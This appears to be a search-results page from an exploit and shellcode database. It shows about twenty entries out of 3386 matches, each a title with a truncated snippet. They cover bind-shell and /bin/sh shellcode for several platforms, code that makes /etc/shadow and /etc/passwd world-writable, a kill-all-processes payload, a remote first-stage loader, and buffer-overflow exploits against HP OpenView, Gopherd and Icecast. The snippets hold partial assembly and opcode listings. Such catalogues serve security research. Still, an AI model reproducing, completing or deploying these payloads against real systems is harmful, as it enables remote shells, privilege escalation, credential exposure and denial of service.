3386 matches found
UMN Gopherd 2.x Halidate Function Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1591/info It is possible to either execute arbitrary code or crash a remote system running University of Minnesota's Gopher Daemon, depending on the data entered. An unchecked buffer exists in the 'halidate' function of...
bds/x86-bindshell on port 2525 shellcode - 167 bytes
No description provided by source. / ================================================== bds/x86-bindshell on port 2525 shellcode 167 bytes ================================================== / / -------------- bds/x86-bindshell on port 2525 167 bytes ------------------------- AUTHOR : beosroot OS ...
[Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh, 0, 0 vars - 30 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 start: 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0, pc 805e: 300a adds r0, 10 8060: 9001 str r0, sp, 4 806...
Linux/ARM - execve("/bin/sh","/bin/sh",0) - 30 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh,/bin/sh,0 - 30 bytes Date: 2010-06-28 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ 8054:...
Linux/ARM chmod("/etc/shadow", 0777) Shellcode 35 Bytes
No description provided by source. / | Title: Linux/ARM chmod/etc/shadow, 0777 Shellcode 35 Bytes | Type: Shellcode | Author: Florian Gaultier [email protected] | Platform: Linux ARM ARM926EJ-S rev 5 v51 | + http://www.shell-storm.org / include stdio.h char shellcode =...
HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
No description provided by source. $Id: hpnnmovwebsnmpsrvmain.rb 12097 2011-03-23 15:45:48Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes
No description provided by source. / Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes Author: Jean Pascal Pereira [email protected] Web: http://0xffe4.org Disassembly of section .text: 08048060 start: 8048060: 31 c0 xor %eax,%eax 8048062: 66 b9 b6 01 mov $0x1b6,%cx 8048066: 50 push...
LAN Messenger <= 1.2.28 - Denial of Service Vulnerability
No description provided by source. !/usr/bin/python Exploit Title: LAN Messenger = v1.2.28 Remote Denial of Service Vulnerability Version: = v1.2.28 Date: 2012-04-28 Author: Julien Ahrens Homepage: www.inshell.net Software Link: http://lanmsngr.sourceforge.net/ Tested on: Windows XP SP3...
OSX/Intel - setuid shell x86_64 - 51 bytes
No description provided by source. / Title: OSX/Intel - setuid shell x8664 - 51 bytes Date: 2010-11-25 Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0 Author: Dustin Schultz - twitter: @thexploit http://thexploit.com BITS 64 section .text global start start: a: mov r8b, 0x02 ; Unix clas...
Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh, 0, 0 vars - 27 bytes Date: 2010-08-31 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM with not a 0x20, 0x0a and 0x00 Disassembly of section .text: 00008054 start...
97 bytes Linx x86 bind shell port 64533
No description provided by source. include stdio.h include string.h / 1 1 0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 by Magnefikko 05.07.2010 [email protected] Promhyl Studies ::...
Icecast 1.3.7/1.3.8 print_client() Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2264/info Versions of icecast up to and including 1.3.8 beta2 exhibit a format string vulnerability in the printclientfunction of utility.c. A malicious user can cause the printf function to overwrite memory at possibly...
HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit
No description provided by source. / Dreatica-FXP crew ---------------------------------------- Target : HP OpenView Network Node Manager v7.5 ---------------------------------------- Exploit : HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Buffer Overflow Exploit Exploit date : 07.04.2008 Exploit...
14 Bytes execve("a->/bin/sh") Local-only Shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 17.04.2010 [email protected] Promhyl Studies :: http://promhyl.oz.pl Subgroup: PRekambr Name: 14 bytes execvea-/bin/sh local-only shellcode Platform: Linux x86 execvea, 0, 0; $ ln -s /bin/sh a $ gcc...
linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes
No description provided by source. / h3ll-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I use it as a first stage payload when I desire to follow up with a real large payload of goodness. This actually is a bit larger than...
linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes
No description provided by source. / ============================================================================================= linux/x86 Shellcode Polymorphic - setuid0 + chmod/etc/shadow, 0666 Shellcode 61 Bytes...
linux/x86 kill all processes 9 bytes
No description provided by source. ; linux/x86 kill all processes 9 bytes ; root@thegibson ; 2010-01-14 section .text global start start: ; kill-1, SIGKILL; mov al, 37 push byte -1 pop ebx mov cl, 9 int 0x80...
Linux x86 - /bin/sh 8 bytes
No description provided by source. / 08048334 main: 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code. step1. This code is compiled. step2. strace -x output binary step3. get execve args in strace result...
freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve//sbin/ipf, //sbin/ipf, -Faa, 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...
Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
No description provided by source. / Title: Solaris/x86 - execve/bin/sh,/bin/sh,NULL - 27 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan Date: 2010-05-19 Tested: SunOS opensolaris 5.11 snv111b i86pc i386 i86pc...